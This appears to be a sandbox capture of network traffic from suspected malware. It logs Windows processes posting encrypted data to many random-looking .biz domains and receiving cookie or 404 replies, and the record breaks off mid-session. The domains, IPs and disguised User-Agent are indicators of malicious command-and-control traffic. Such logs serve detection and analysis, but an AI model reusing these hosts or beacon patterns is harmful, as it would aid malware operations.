Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:48.117265940 CEST | 356 | OUT | POST /nvddaclxpive HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:48.117571115 CEST | 786 | OUT | Data Raw: 83 3f 8f c6 9d d3 72 82 06 03 00 00 59 6a 92 da e2 dd 77 a1 43 4b 5a 02 a0 45 36 53 91 12 5c 2a b6 75 79 2f 71 f5 f2 b3 21 82 c4 b9 f4 a8 19 ac f9 d9 1f 25 ac 68 c6 2f c0 c1 ce 8a 9f a6 59 f1 01 5f 89 f9 55 e3 49 26 c4 d6 36 e4 a1 eb 65 65 c3 41
Oct 8, 2024 15:28:48.863157988 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1e5aa2b00de50ef030e0e227d488cc07|8.46.123.33|1728394128|1728394128|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49867 | 18.208.156.248 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:48.329600096 CEST | 342 | OUT | POST /h HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:48.329854965 CEST | 778 | OUT | Data Raw: cf 96 ab 9c e7 9f de 5a fe 02 00 00 10 5b 29 02 77 f6 c3 d5 37 af 40 b1 c2 d0 58 a8 d3 c5 8b b1 77 21 99 e8 70 8b 35 7f 94 85 44 82 d1 19 31 b4 28 a7 eb 02 34 8c 1e ee 90 07 c2 f8 49 f8 66 f3 c4 2f 3b 5a cf 97 b9 8a 5b e9 1a bb 11 66 26 3a 78 5c
Oct 8, 2024 15:28:48.805532932 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a689e3b38512a2cf5cc8e5bf04f62df0|8.46.123.33|1728394128|1728394128|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49872 | 35.164.78.200 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:49.007145882 CEST | 343 | OUT | POST /m HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:49.007164955 CEST | 786 | OUT | Data Raw: 2f 18 d1 7d 62 a7 ec 14 06 03 00 00 98 2b f0 cb 94 77 a9 e1 9f 1f 79 ca 5b f1 c8 ca 17 b2 e8 73 90 3d 09 fa 3b d8 ee a3 e1 b3 61 8d 1f 06 9f 54 f8 3c 47 06 4a 11 8b 20 38 a7 c4 da 20 12 a2 16 d2 10 ff 36 80 fe ae 5b 9b 81 4c db 9a a8 d6 a7 42 fa
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /}b+wy[s=;aT<GJ 8 6[LB_}mhG(i%@UHC[tdrIV;m.*9.{"j|<\K3wnZ:(~%hU.JP*@O|?_\A
Oct 8, 2024 15:28:50.658593893 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bfc137724f4b506fa2a6001631c1a0df|8.46.123.33|1728394129|1728394129|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
Oct 8, 2024 15:28:50.660540104 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bfc137724f4b506fa2a6001631c1a0df|8.46.123.33|1728394129|1728394129|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
Oct 8, 2024 15:28:50.662575960 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bfc137724f4b506fa2a6001631c1a0df|8.46.123.33|1728394129|1728394129|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49877 | 208.100.26.245 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:49.236701965 CEST | 352 | OUT | POST /pboamknl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:49.236725092 CEST | 778 | OUT | Data Raw: da 10 2f 03 a2 60 87 61 fe 02 00 00 3f d0 56 d9 29 f8 e5 55 d9 02 21 01 11 c2 a1 c1 d2 7a 83 be cd 26 04 48 75 f0 f6 2c 05 f9 7c 94 0d 4b 50 82 48 e9 ef 99 a5 7b 18 cc 7c cf 8d 62 b7 46 a0 24 7b 42 93 8a a5 62 16 0b 79 84 ab 3c 4c 9b 28 0d f6 86
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /`a?V)U!z&Hu,|KPH{|bF${Bby<L(=s.tCVgpXARB(OpbH-gt%RupG>^?C#"KUb-sPg-+A9swb=Zl4eSh6^BC,'#1^68L|G5
Oct 8, 2024 15:28:50.657612085 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 8, 2024 15:28:50.660530090 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 8, 2024 15:28:50.661571980 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 8, 2024 15:28:50.662606001 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 8, 2024 15:28:50.811058044 CEST | 356 | OUT | POST /mfuaeqrjbxmv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:50.811090946 CEST | 778 | OUT | Data Raw: fb e9 0d c8 50 fb de 79 fe 02 00 00 ac 4a 98 62 c9 77 de 35 88 c1 15 11 85 9f 97 fd d7 e5 34 9b 20 a1 b7 6a 0a 40 c6 2d 8d 3d d2 a6 00 73 5a 3b 12 64 32 c8 13 e6 b0 44 c7 5c 9f 1c bf aa 3d ba b2 29 8f 88 0a d1 32 0b a0 2f 0b 02 be 57 bb 88 c8 9a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: PyJbw54 j@-=sZ;d2D\=)2/W)~|Q+^>z0/)#0$O;!e9btSF8Q"\O^F`Z"I#2v~%d3E6F-9$ L)VpPbst2tb
Oct 8, 2024 15:28:50.929364920 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49883 | 3.94.10.34 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:50.817447901 CEST | 360 | OUT | POST /nxbumxilirhmvku HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:50.817636967 CEST | 786 | OUT | Data Raw: 9e e9 b3 c7 e5 6b 6a 25 06 03 00 00 d1 27 de 53 26 38 55 22 98 21 12 80 e0 c5 fb 18 8e bb d6 94 21 ac f1 e1 d2 44 aa e6 60 43 be d6 fb 04 d2 e6 7c e2 ac da eb 96 a9 dd 72 df 28 a1 62 4c 9c 1e d8 51 96 9b 84 62 40 f7 e9 3f 8a 88 8b 2a 25 b4 b8 8d
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: kj%'S&8U"!!D`C|r(bLQb@?*% ;xY*f3IC"M>P1T|%:5azFUE7.-?]Rz~E}P=Oobw7*h*X6Zd#"r|4PA"21K;)K_}%C
Oct 8, 2024 15:28:51.294512033 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c1dc517ceaf9c48277a889e893824514|8.46.123.33|1728394131|1728394131|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49885 | 13.251.16.150 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:51.285326958 CEST | 349 | OUT | POST /jaumpxr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:51.285342932 CEST | 778 | OUT | Data Raw: 8a 26 b8 45 85 fe 13 c1 fe 02 00 00 9a d6 9a 77 c5 c0 a2 5a 7c cd 83 06 9d 4d 47 40 41 da d9 77 6f a6 a2 bc 6a 13 34 aa 42 46 47 d6 7c bd 53 f7 de c9 18 d6 e2 f6 4b be fc 9c c9 85 0a 1a e4 11 d3 c9 bb 41 84 76 2e ac 15 b8 8a d4 4b e9 e9 dc 14 45
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &EwZ|MG@Awoj4BFG|SKAv.KE%mA_4g~<]^5bvT5]Tb&-=V2u``eq,dkaAlZDa9e$Xn8B?Uy)53I1
Oct 8, 2024 15:28:52.610193968 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=06a2aba25caf25346dc29bef3145ae2a|8.46.123.33|1728394132|1728394132|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49886 | 165.160.13.20 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:51.392247915 CEST | 353 | OUT | POST /ptbejgswjfxl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:51.392313004 CEST | 786 | OUT | Data Raw: 64 5f 97 67 bb e5 a6 97 06 03 00 00 ad 65 ab 2d 1c 9b 6a 80 27 23 de 13 87 16 ff 46 23 ad c6 81 01 b7 23 7f c2 6d b2 a0 86 09 91 a0 f3 dc 08 a6 e4 0e 77 50 a5 e7 99 59 05 a4 bf 23 73 58 0d 2f 17 30 11 b6 8c 38 35 8a f4 52 97 d1 9b a2 1d 80 25 95
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: d_ge-j'#F##mwPY#sX/085R%[6T1989xW+U5'QRR>PPaFqB2ia)MUK>e@K^7AnS;\bLX+qr&^i%ggkg*vW%smI`*K
Oct 8, 2024 15:28:52.117394924 CEST | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Oct 8, 2024 15:28:52.167762995 CEST | 352 | OUT | POST /xgterudimsf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:52.167799950 CEST | 786 | OUT | Data Raw: 5a 3a f4 26 1e 7e b6 78 06 03 00 00 41 5b f2 a5 be ec b2 05 ca 20 1d fe c5 3b 24 71 c1 68 20 61 71 95 83 61 23 ed cf 95 45 e3 7a 3a 9c 77 fb bd 58 81 b5 56 f7 5d aa cb 93 9f a9 a0 b2 7a b4 be 86 46 85 fb cb 76 5c 79 4c 7b 2f 19 cd 54 d9 a8 48 a2
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Z:&~xA[ ;$qh aqa#Ez:wXV]zFv\yL{/TH(F-gXMdBq51EAw_6>d"T>e-F{*a#-^Pl$N[,c&LE-\oQW]cZ|sR3R|4~bUR}*._U
Oct 8, 2024 15:28:52.403785944 CEST | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49898 | 54.244.188.177 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:52.714023113 CEST | 357 | OUT | POST /mitdmmperwbt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: oshhkdluh.biz
